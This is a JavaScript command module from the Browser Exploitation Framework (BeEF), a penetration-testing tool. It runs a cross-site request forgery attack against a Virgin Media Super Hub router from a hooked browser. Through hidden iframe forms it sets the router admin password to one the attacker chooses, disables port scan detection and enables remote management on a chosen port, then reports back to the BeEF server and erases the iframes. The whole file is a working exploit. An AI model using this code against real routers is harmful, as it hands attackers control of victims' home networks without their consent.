//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

	var gateway = '<%= @base %>'; 
	var passwd  = '<%= @password %>';
	var port    = '<%= @port %>';
	var timeout = 15;

	var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", "application/x-www-form-urlencoded", [
		{'type':'hidden', 'name':'NetgearPassword',        'value':passwd},
		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
		{'type':'hidden', 'name':'RestoreFactoryNo',       'value':'0x00'}
	]);

	var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", "application/x-www-form-urlencoded", [
		{'type':'hidden', 'name':'cbPortScanDetection',    'value':''}
	]);

	var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", "application/x-www-form-urlencoded", [
		{'type':'hidden', 'name':'NetgearVMRmEnable',      'value':'0x01'},
		{'type':'hidden', 'name':'NetgearVMRmPortNumber',  'value':port}
	]);

	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

	cleanup = function() {
		document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
		document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
		document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
	}
	setTimeout("cleanup()", timeout*1000);

});

